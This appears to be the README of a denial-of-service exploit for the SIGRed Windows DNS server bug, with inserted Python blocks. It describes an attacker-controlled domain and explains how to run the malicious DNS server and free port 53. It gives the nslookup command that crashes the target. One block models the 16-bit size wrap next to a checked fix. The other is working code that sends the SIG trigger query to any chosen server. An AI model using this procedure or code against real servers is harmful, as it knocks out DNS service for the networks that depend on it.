Credit for the bug goes entirely to Check Point Research (@_cpresearch_), who did an incredible writeup of it (props to @sagitz_ for the post). Their writeup can be found here.
This exploit was written by @maxpl0it
Quick summary of how it works:
- From a host on the LAN, trigger a DNS query (specifically, a query for SIG records) for a name under the attacker-controlled domain (for example 9.evil_domain.com)
- The query is sent to the DNS service on the vulnerable Windows server
- The vulnerable server forwards the query to its configured upstream resolver (often the public Google DNS addresses)
- The upstream resolver responds with the nameservers for the evil domain
- The vulnerable server then acts as a DNS client and queries the evil nameserver directly
- The evil server responds with a payload whose size overflows a 2-byte (16-bit) length value, so the vulnerable server allocates a buffer smaller than the data it is about to copy
- The signature is copied into that undersized buffer, memory is corrupted (of course), and the DNS service on the vulnerable server crashes
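The 2-byte overflow in the summary above, as an added illustration that is not code from sigred_dos.py or from the Windows DNS server. The page only says that a 2-byte number overflows; the choice to model it as a signature length plus a signer-name length summed into a 16-bit variable is my assumption for illustration, as are all the sizes used. The naive and checked versions sit side by side, and simulate_copy shows how many bytes the copy would run past the undersized buffer.

```python
# Added illustration of the 16-bit size wrap described in the summary. Not code
# from sigred_dos.py or dns.exe; the two quantities being summed (signature
# length + signer-name length) are an assumption made for this example.

U16_MAX = 0xFFFF


def naive_alloc_size(sig_len: int, name_len: int) -> int:
    """Size computation kept in a 16-bit variable: the sum silently wraps."""
    return (sig_len + name_len) & U16_MAX


def checked_alloc_size(sig_len: int, name_len: int) -> int:
    """Hardened form: refuse any record whose true size does not fit in 16 bits."""
    total = sig_len + name_len
    if total > U16_MAX:
        raise ValueError(f"record size {total} exceeds 16-bit limit {U16_MAX}")
    return total


def min_sig_len_to_wrap(name_len: int) -> int:
    """Smallest signature length that makes the 16-bit sum wrap for a given name length."""
    return U16_MAX + 1 - name_len


def simulate_copy(sig_len: int, name_len: int) -> dict:
    """Allocate a buffer of the naive size, then 'copy' the real data into it.

    Returns the true size, the wrapped allocation, and how many bytes the copy
    would write past the end of the buffer (0 when nothing wrapped).
    """
    needed = sig_len + name_len
    allocated = naive_alloc_size(sig_len, name_len)
    buf = bytearray(allocated)
    data = b"\x41" * needed  # constructed stand-in for the name + signature bytes
    overflow = max(0, len(data) - len(buf))
    buf[:len(buf)] = data[:len(buf)]  # only the in-bounds part of the copy is modelled
    return {"needed": needed, "allocated": allocated, "overflow_bytes": overflow}


if __name__ == "__main__":
    # Constructed sizes: a 600-byte signer name plus a 65,000-byte signature.
    print(naive_alloc_size(65_000, 600))  # 64, although 65,600 bytes are needed
    print(simulate_copy(65_000, 600))
    try:
        checked_alloc_size(65_000, 600)
    except ValueError as exc:
        print("rejected:", exc)
```

With the constructed sizes the true record size is 65,600 bytes but the wrapped value is 64, so the copy would write 65,536 bytes past the allocation; min_sig_len_to_wrap shows the smallest signature that crosses the 16-bit boundary for a given name length.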
- This exploit requires you to set up a domain whose nameserver (NS) records point at the host that will run this script.
- Set up that host and run this script. It listens on port 53 over both TCP and UDP.
- If you get an error saying that the ports are busy, use netstat -pa to find out what is already listening on port 53 (probably systemd-resolved) and disable and stop it. If nothing else is listening, make sure you have killed all earlier instances of this script before re-running it.
For example, I ran python sigred_dos.py ibrokethe.net to start the malicious DNS server.
If you have access to the Windows server, you can configure a conditional forwarder that points ibrokethe.net at the IP address of the host running the script. This effectively skips steps 3 and 4 in the summary (the round trip through the upstream resolver).
To trigger the vulnerability on the Windows DNS server, run nslookup -type=sig 9.your_domain_name_here dns_server_to_target
The '9' subdomain label is required. You do not need to add any records for it to your zone, since the script answers for that name itself.
As an example, I ran nslookup -type=sig 9.ibrokethe.net 127.0.0.1, as I was running this on the server.
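The trigger step above, as an added example rather than code from sigred_dos.py: it builds a DNS query equivalent to what nslookup -type=sig sends (one question, type SIG, RD set), sends it over UDP or over TCP with the 2-byte length prefix DNS over TCP uses, and decodes the reply header so you can see whether the target answered at all. The domain and server arguments are placeholders; 9.ibrokethe.net is only reused from the example above.

```python
# Added example of the trigger query. Not code from sigred_dos.py; the names
# and addresses passed in are placeholders chosen by whoever runs it.
import socket
import struct

QTYPE_SIG = 24   # RR type number for SIG
QCLASS_IN = 1


def encode_name(name: str) -> bytes:
    """Encode a dotted name in DNS wire format: length-prefixed labels plus a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 1 <= len(raw) <= 63:
            raise ValueError(f"bad label: {label!r}")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def build_sig_query(name: str, txid: int = 0x1337) -> bytes:
    """Standard query with RD set and a single question of type SIG, class IN."""
    flags = 0x0100  # QR=0, opcode=0 (QUERY), RD=1
    header = struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", QTYPE_SIG, QCLASS_IN)


def parse_header(msg: bytes) -> dict:
    """Decode the 12-byte DNS header so a reply can be sanity-checked."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    return {"txid": txid, "qr": flags >> 15, "tc": (flags >> 9) & 1,
            "rcode": flags & 0xF, "qdcount": qd, "ancount": an,
            "nscount": ns, "arcount": ar}


def query_udp(name: str, server: str, port: int = 53, timeout: float = 5.0):
    """Send the SIG query over UDP and return (decoded header, raw reply)."""
    q = build_sig_query(name)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(q, (server, port))
        data, _ = s.recvfrom(65535)
    return parse_header(data), data


def recv_exact(sock: socket.socket, n: int) -> bytes:
    """Read exactly n bytes from a stream socket or raise."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed before the reply was complete")
        buf += chunk
    return buf


def query_tcp(name: str, server: str, port: int = 53, timeout: float = 5.0):
    """Same query over TCP: each DNS message is prefixed with a 2-byte big-endian length."""
    q = build_sig_query(name)
    with socket.create_connection((server, port), timeout=timeout) as s:
        s.sendall(struct.pack("!H", len(q)) + q)
        (length,) = struct.unpack("!H", recv_exact(s, 2))
        data = recv_exact(s, length)
    return parse_header(data), data


if __name__ == "__main__":
    import sys
    # Usage: python trigger_sig_query.py 9.ibrokethe.net 127.0.0.1
    name, server = sys.argv[1], sys.argv[2]
    hdr, _ = query_udp(name, server)
    print(hdr)
```

If the UDP reply comes back with tc set to 1, the resolver truncated it and a real client would retry the same question with query_tcp, which is why the malicious server has to listen on both transports.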